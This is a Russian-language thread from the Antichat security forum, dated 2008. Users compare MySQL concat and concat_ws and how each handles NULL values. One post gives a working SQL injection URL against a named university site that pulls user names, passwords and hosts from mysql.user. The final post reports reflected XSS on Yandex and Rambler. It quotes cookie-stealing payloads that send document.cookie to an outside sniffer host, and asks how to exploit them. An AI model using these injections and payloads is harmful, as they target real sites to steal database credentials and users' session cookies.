ANTICHAT — форум по информационной безопасности, OSINT и технологиям

я же написал, что там есть пустые поля и concat возвращает null

я чё-то не понял наверное
select concat(col1,':',col2,':',col3) from table limit 0,1
предположим что у тебя колонка col2 имеет значение null
функция вернёт тебе
blabla1::blabla3

Да и concat_ws тоже самое вернёт вроде
щас тебе в асю стукну

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

неа, я сейчас посмотрел Piflit правильно говорит, у меня вот как получилось:

попробуй сам, у меня мускул 5, если функция concat получает хоть одно значение null, то возвращает null

например:
SELECT concat(':','ff',null) FROM `user` вернет null

__________________
Карфаген должен быть разрушен...

Piflit (01:42:38 21/01/2008)
среди этих полей есть нулл и весь конкат возвращает нулл - а дожен результат запроса

Piflit (01:42:58 21/01/2008)
а про конкат_вс поля едут - а мне надо выводить это в ровную табличку

ну тогда делай по аналогии с моим примером, или дай структуру, ну вобщем поконкретней опиши, я наверное смогу помочь в этом вопросе

__________________
Карфаген должен быть разрушен...

http://biophysics.asu.edu/banf/show_files.php?user_id=-3+union+select+concat(user,':',password,':',host), 2,3+from+mysql.user+limit+2,1

здесь колонка password вернула null
всё выводится
зачем вам самим null подстовлять в функцию?

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

незнаю, пробую на phpmyadmin, null подставляю сам просто для примера, пробую на реально существующей таблице, в которой есть значение null, concat выдает null, хм вот сейчас посмотрел mysql.user поле password у пользователя root, пустое, но не null, при этом concat действительно работает как говорит Spyder, а есть еще одна табличка там конкретно прописано, что значение поля username null, при выборке из этой таблички и этого поля concat выдает null, а concat_ws игнорирует, так как говорил Piflit

Скорее всего это связано с типами полей, хотя хз

__________________
Карфаген должен быть разрушен...

2PunkAss извини не было времени посмотреть, но вобщем то вот как твои проблеммы решаются:

__________________
Карфаген должен быть разрушен...

уязвимость http://images.yandex.ru/
поиск ввожу </script><script>alert(document.cookie)</script> и появляется алерт пытаюсь сделать скрипт типа <script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script> тогда ничего не происходит он просто пытается это найти. как правильно использовать данную ксс?
----------------------------------------
на рамблере
ксс http://www.rambler.ru/db/support/feedback.shtml?name="<script >alert()</script>выводит алерт
пытался сделать скрипт типа <script img src="http://s.netsec.ru/mda.gif"> но мне на сниффер приходило только
Time: 20.01 -10.35.48
IP: 80.64.91.1
Host: http://www.rambler.ru/db/support/feedback.shtml?name="<script src="http://s.netsec.ru/frigid20.gif?" document.cookie;></script>
Browser: Mozilla/5.0
как правильно использовать данный ксс?